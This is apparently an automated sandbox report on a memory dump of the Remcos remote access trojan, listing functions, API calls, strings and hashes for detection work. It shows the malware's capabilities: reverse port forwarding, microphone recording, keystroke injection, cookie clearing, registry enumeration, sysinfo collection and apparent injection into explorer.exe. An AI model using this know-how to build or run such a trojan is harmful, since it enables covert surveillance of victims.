Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5

Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00411514
inet_ntoa.WS2_32(?), ref: 004115AF

Strings

StartForward, xrefs: 00411673
GetDirectListeningPort, xrefs: 004116B2
StopForward, xrefs: 00411690
NG, xrefs: 0041153A
StopReverse, xrefs: 004116A1
StartReverse, xrefs: 0041167F

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
API String ID: 3578746661-3604713145
Opcode ID: a200ba08cca614f5ca41b60dfe45ad6e7d9639a173154d8eaf3edc2c4edf8b7b
Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
Opcode Fuzzy Hash: a200ba08cca614f5ca41b60dfe45ad6e7d9639a173154d8eaf3edc2c4edf8b7b
Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE

Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27

Strings

pow, xrefs: 0045600B, 004560B7, 004560CA
exp, xrefs: 00455FEC, 0045604E
sqrt, xrefs: 004560AB
log, xrefs: 00455FCD, 00455FD9
asin, xrefs: 00456093
log10, xrefs: 00455F71, 00455FC1
acos, xrefs: 0045609F

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E

Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E

Sleep.KERNEL32(00000064), ref: 00417521
DeleteFileW.KERNEL32(00000000), ref: 00417555

Strings

open, xrefs: 004174EF
\sysinfo.txt, xrefs: 004174A0
temp, xrefs: 004174A5
/t , xrefs: 004174D4
dxdiag, xrefs: 004174EA

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: 80bc1f01d41e6bb49ab2ea0752573067485f1394140a330d823018e0c212e60a
Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
Opcode Fuzzy Hash: 80bc1f01d41e6bb49ab2ea0752573067485f1394140a330d823018e0c212e60a
Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C

Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E

Strings

\explorer.exe, xrefs: 00407400
windir, xrefs: 004073EA
explorer.exe, xrefs: 00407450, 0040747B
[-] NtAllocateVirtualMemory Error, xrefs: 0040743D
PEB: %x, xrefs: 004074AF
[+] NtAllocateVirtualMemory Success, xrefs: 00407410

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
API String ID: 2050909247-4242073005
Opcode ID: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
Opcode Fuzzy Hash: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F

Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401D50

Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9

waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F

Strings

%Y-%m-%d %H.%M, xrefs: 00401D41
dMG, xrefs: 00401D81
|MG, xrefs: 00401E08
.wav, xrefs: 00401D69

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
API String ID: 3809562944-243156785
Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
Opcode Fuzzy Hash: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E

Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
int.LIBCPMT ref: 00410E81

Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC

std::_Facet_Register.LIBCPMT ref: 00410EC1
std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
__CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
__Init_thread_footer.LIBCMT ref: 00410F29

Strings

,kG, xrefs: 00410F04
0kG, xrefs: 00410F31

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID: ,kG$0kG
API String ID: 3815856325-2015055088
Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D

Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
waveInStart.WINMM ref: 00401CFE

Strings

PG, xrefs: 00401C27
|MG, xrefs: 00401C9B
dMG, xrefs: 00401BED

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID: dMG$|MG$PG
API String ID: 1356121797-532278878
Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C

Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476

Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
TranslateMessage.USER32(?), ref: 0041D4E9
DispatchMessageA.USER32 ref: 0041D4F3
GetMessageA.USER32 ref: 0041D500

Strings

Remcos, xrefs: 0041D4B8

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98

Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69

Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

udp, xrefs: 00414A46
tcp, xrefs: 00414A73

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A

Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004018BE
ExitThread.KERNEL32 ref: 004018F6
waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

Strings

XMG, xrefs: 00401902
NG, xrefs: 00401990
PkG, xrefs: 00401888
NG, xrefs: 0040190D

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: PkG$XMG$NG$NG
API String ID: 1649129571-3151166067
Opcode ID: f17f11b8b39cffc117ffaa71cd5d18446726339bb65f1098d7a399b3bb622f5a
Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
Opcode Fuzzy Hash: f17f11b8b39cffc117ffaa71cd5d18446726339bb65f1098d7a399b3bb622f5a
Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E

Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

CloseHandle.KERNEL32(00000000), ref: 00407A4D
MoveFileW.KERNEL32 ref: 00407A6A
CloseHandle.KERNEL32(00000000), ref: 00407A95
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5

Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3

Strings

.part, xrefs: 00407989

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A

Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C), ref: 004199CC
SendInput.USER32(00000001,?,0000001C), ref: 004199ED
SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
SendInput.USER32(00000001,?,0000001C), ref: 00419A21
SendInput.USER32(00000001,?,0000001C), ref: 00419A37
SendInput.USER32(00000001,?,0000001C), ref: 00419A54
SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
SendInput.USER32(00000001,?,0000001C), ref: 00419A8B

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97

Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00447679
__freea.LIBCMT ref: 00447723
__freea.LIBCMT ref: 00447741

Part of subcall function 00435E40: _free.LIBCMT ref: 00435E56

Strings

zD, xrefs: 004479AB
am/pm, xrefs: 004477A4
a/p, xrefs: 00447808

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm$zD
API String ID: 2936374016-2723203690
Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9

Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B

Strings

TG, xrefs: 00413BFD
[regsplt], xrefs: 00413C17
xUG, xrefs: 00413C46

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]$xUG$TG
API String ID: 3554306468-1165877943
Opcode ID: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
Opcode Fuzzy Hash: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9

Function 0044B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 0044B3FE
__fassign.LIBCMT ref: 0044B479
__fassign.LIBCMT ref: 0044B494
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9

Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00456D49

Strings

D[E, xrefs: 00456C6D, 00456D5E
D[E, xrefs: 00456D10

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID: D[E$D[E
API String ID: 269201875-3695742444
Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D

Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00413D46

Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

RegCloseKey.ADVAPI32(00000000), ref: 00413EB4

Strings

TG, xrefs: 00413E9A
NG, xrefs: 00413E23
xUG, xrefs: 00413EA6
NG, xrefs: 00413D69

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: xUG$NG$NG$TG
API String ID: 3114080316-2811732169
Opcode ID: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
Opcode Fuzzy Hash: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E

Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8

_wcslen.LIBCMT ref: 0041B763

Strings

http\shell\open\command, xrefs: 0041B69A
8SG, xrefs: 0041B709, 0041B70E
.exe, xrefs: 0041B6B5
program files\, xrefs: 0041B749, 0041B750, 0041B762
program files (x86)\, xrefs: 0041B75D

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue_wcslen
String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
API String ID: 37874593-122982132
Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269

Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
PathFileExistsA.SHLWAPI(?), ref: 0040BF78

Strings

[IE cookies cleared!], xrefs: 0040BFC5, 0040BFEA
Cookies, xrefs: 0040BEFD
[IE cookies not found], xrefs: 0040BF40
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040BF02

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
Opcode Fuzzy Hash: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE

Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8

Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A

_free.LIBCMT ref: 00450F48

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00450F53
_free.LIBCMT ref: 00450F5E
